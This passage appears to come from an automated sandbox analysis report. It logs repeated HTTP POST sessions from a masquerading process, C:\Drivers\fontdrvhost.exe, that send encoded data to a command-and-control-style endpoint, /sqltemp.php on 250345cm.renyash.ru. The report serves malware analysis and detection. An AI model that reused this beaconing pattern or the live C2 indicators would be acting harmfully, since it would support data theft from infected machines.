                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3704&min_rtt=1637&rtt_var=4749&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=80308&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            51192.168.2.449798104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:43.604300022 CET295OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Jan 1, 2025 14:52:43.948909044 CET1012OUTData Raw: 53 53 5a 51 54 50 51 56 58 56 52 59 56 5b 59 55 5b 58 54 5f 55 5a 50 59 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: SSZQTPQVXVRYV[YU[XT_UZPYZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-'?4%Y$X;,:4-$X+))4Y4,+85D2Y :&Y.,Y-)
                                                                                                                                                                                            Jan 1, 2025 14:52:44.098159075 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:52:44.367451906 CET798INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:52:44 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TYigkY3jbHFumNL79K9FlE5ndnabV2914N3gr3uHjIjlPLBVo9mGE7eyojxHh0UYQ9XO5DY4B27wYQYK3fjCwbCa1xtA7nKuqQ8WnXsGNMNQ7qYiNRX4oxxi3IK4KloIae0XnFFj"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fdd35aa00f3e-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3430&min_rtt=1563&rtt_var=4320&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1307&delivery_rate=88479&cwnd=212&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            52192.168.2.449799104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:44.496001959 CET295OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Jan 1, 2025 14:52:44.855182886 CET1012OUTData Raw: 53 50 5f 53 51 5c 51 50 58 56 52 59 56 5a 59 50 5b 5b 54 59 55 5a 50 54 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: SP_SQ\QPXVRYVZYP[[TYUZPTZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.X'Y9] Y"0-+.*>7=**'*=77+;1?#R::&Y.,Y--
                                                                                                                                                                                            Jan 1, 2025 14:52:44.939821959 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:52:45.213793039 CET801INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:52:45 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aB7KzuuiYDBVz8DX1WlLkgs0xExqmNwGzONfgUU0ULQrUeFL5hYn97wXYWubdK9K%2BQWYPV0qiIeFu4yAJaLsPPdy748CxxZodHmaIthlVNtEVIA0In5b1hm9KnjFhfXVj38PnMfm"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fdd89ec8425d-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2655&min_rtt=1623&rtt_var=2673&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1307&delivery_rate=147728&cwnd=192&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            53192.168.2.449800104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:45.347796917 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:52:45.699018002 CET1012OUTData Raw: 53 57 5f 57 51 5b 54 5c 58 56 52 59 56 5a 59 57 5b 59 54 51 55 5f 50 54 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: SW_WQ[T\XVRYVZYW[YTQU_PTZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.'/%#,%%.?A,&7<9+S*Z#T?Y*;52Y;V9:&Y.,Y--
                                                                                                                                                                                            Jan 1, 2025 14:52:45.833700895 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:52:46.006536007 CET809INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:52:45 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BsHqtLHAL%2FreZ3X5PXSgTcE331kFdqXViv1MybE0zlJURMFiguV4KeUEDstbCreYMRwh74XAAEzmNoNI%2F7fVmeLQbDqsOUeGbMtHlo4UXNWqQZk0wzkOtsd2QovVbe%2Be%2FW%2F5zdf7"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fdde2ac642c0-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=8546&min_rtt=2213&rtt_var=13497&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=27608&cwnd=211&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            54192.168.2.449801104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:46.135413885 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:52:46.480454922 CET1012OUTData Raw: 53 54 5a 53 51 5d 51 55 58 56 52 59 56 5e 59 56 5b 53 54 5a 55 55 50 55 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: STZSQ]QUXVRYV^YV[STZUUPUZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.X3,&#"'?8:##**8).;7T ?;.%Y$9&Y.,Y-
                                                                                                                                                                                            Jan 1, 2025 14:52:46.608587027 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:52:46.874351978 CET809INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:52:46 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w%2F0L%2F5B0COUDx%2FycNXSbxBT3fBi6MktNg85JP15HBlXIS7bvJdfmn2mQ4m4lNAqqazDmmvYCk2Qxdd%2Be7m3aMNse%2BS4nwYpw2PyIomUN3ijCZOinMfSfCumlCGl59ypefI2pXczo"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fde2fe178cb7-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3165&min_rtt=1908&rtt_var=3229&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=122032&cwnd=167&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            55192.168.2.449802104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:46.996001005 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:52:47.355566025 CET1012OUTData Raw: 53 53 5a 54 54 51 51 51 58 56 52 59 56 50 59 53 5b 5a 54 5a 55 5c 50 55 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: SSZTTQQQXVRYVPYS[ZTZU\PUZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S._0%[7<!03B,:=#(:?U).Y#(6%?-:&Y.,Y-
                                                                                                                                                                                            Jan 1, 2025 14:52:47.449286938 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:52:47.716538906 CET806INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:52:47 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F5xg%2FGGcF7AvTfVxOdrQu%2BG4CwR8S0ncInO%2FW7RnaJx27isV6FZ5PJ6DbFPrfyDFAsVUcJjyzmMi0HGrIYAQHUeXZoWpEK2pB3DqWqGUSmcGDtFSaRrKKp%2FaM2KRm3xGgPorYPki"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fde84fe18c1d-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=5122&min_rtt=2010&rtt_var=6978&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=54260&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            56192.168.2.449803104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:47.843517065 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:52:48.198997021 CET1012OUTData Raw: 53 54 5f 5d 51 5f 54 56 58 56 52 59 56 5e 59 52 5b 5c 54 5a 55 5d 50 5e 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: ST_]Q_TVXVRYV^YR[\TZU]P^Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.Z3,:4'=;C,#-/+?*-8[#Z*;!E&/;-&Y.,Y-


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            57192.168.2.449804104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:48.299252987 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1852
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:52:48.652108908 CET1852OUTData Raw: 53 55 5a 57 54 5d 51 55 58 56 52 59 56 5e 59 5f 5b 5f 54 5f 55 5c 50 5a 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: SUZWT]QUXVRYV^Y_[_T_U\PZZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-$/=Y >$='B,*4=[?)8(. !?[<])D%<?S-&Y.,Y-
                                                                                                                                                                                            Jan 1, 2025 14:52:48.746593952 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:52:49.014851093 CET950INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:52:48 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6K7medMD8m6o8CATZCoXl1VnwzKmo9uMZHsdNNb5t9PCPsB80THdq7midFIVoRYLG15kdiOA2LVrUeLLEHcLj4slXuDyqIF9lYdttNCzJrInZf3M2ECOt23MvDjmr5I6lXSN0%2Frl"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fdf0680e439d-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=8450&min_rtt=1628&rtt_var=14255&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2171&delivery_rate=25975&cwnd=200&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 39 38 0d 0a 00 1f 25 55 3e 3e 35 0f 25 1c 05 00 2a 3d 2f 10 25 10 0b 02 3f 5e 2a 59 26 2e 0d 59 3d 2a 3f 58 36 3f 29 11 32 38 38 1d 20 2d 2c 03 33 1e 2b 59 05 1c 20 40 36 2f 0e 5e 3d 2e 33 16 27 2f 03 13 26 3e 28 5d 3c 38 24 57 23 2b 27 5a 27 3e 2b 03 29 3a 34 1f 27 05 3c 03 2d 01 2d 52 30 10 2c 54 00 11 25 0c 33 1f 3f 05 37 37 2c 12 22 22 25 12 31 34 25 09 26 2f 2f 55 37 39 08 1b 31 0b 33 5e 35 0d 3d 07 32 3b 26 05 20 03 30 0d 29 04 25 53 20 02 2d 48 05 3f 57 53 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 98%U>>5%*=/%?^*Y&.Y=*?X6?)288 -,3+Y @6/^=.3'/&>(]<8$W#+'Z'>+):4'<--R0,T%3?77,""%14%&//U7913^5=2;& 0)%S -H?WS0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            58192.168.2.449805104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:48.416573048 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:52:48.761404037 CET1012OUTData Raw: 56 51 5a 51 54 51 51 57 58 56 52 59 56 58 59 57 5b 5b 54 5d 55 5a 50 59 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: VQZQTQQWXVRYVXYW[[T]UZPYZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.X$>#/=_0=48 [3()+W)8]#+[<52?T:&Y.,Y-%
                                                                                                                                                                                            Jan 1, 2025 14:52:48.859692097 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:52:49.029669046 CET817INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:52:48 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NFUW%2F3%2FhOtgt948rgtL%2Bb5xFj8DblZebbpT8SOEueuuuQxReAkdGLvfyjU5ul9otNm%2BWqotxc48PMQP85o9pY4%2F5v2pGNnSH%2Fi%2BvHTRXhk%2FLA1mXGqHOizO6iktRiKKL%2FkylqQI9"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fdf11f344304-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=7965&min_rtt=1701&rtt_var=13167&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=28176&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            59192.168.2.449806104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:49.151197910 CET295OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Jan 1, 2025 14:52:49.495932102 CET1012OUTData Raw: 56 55 5f 52 51 58 54 5d 58 56 52 59 56 5c 59 51 5b 53 54 5c 55 58 50 55 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: VU_RQXT]XVRYV\YQ[ST\UXPUZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.^&/"7?)%=4.:)W7 [(_+V)(724<61?'W,:&Y.,Y-5
                                                                                                                                                                                            Jan 1, 2025 14:52:49.597302914 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:52:49.866640091 CET808INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:52:49 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vko7v867KZu9l3FFi%2FmYOY95W7Dy69s49sboBg93%2FwxNAWBemyZr4ao%2BavIJwjsrknmU3m%2BUgppzFKw5j9Bbi7DAv8WDRLacLWkWcQhOm0tfzCGUDK0SybtgMyRXeBG%2BKOL21ca4"}],"group":"cf-nel","max_age":604800}
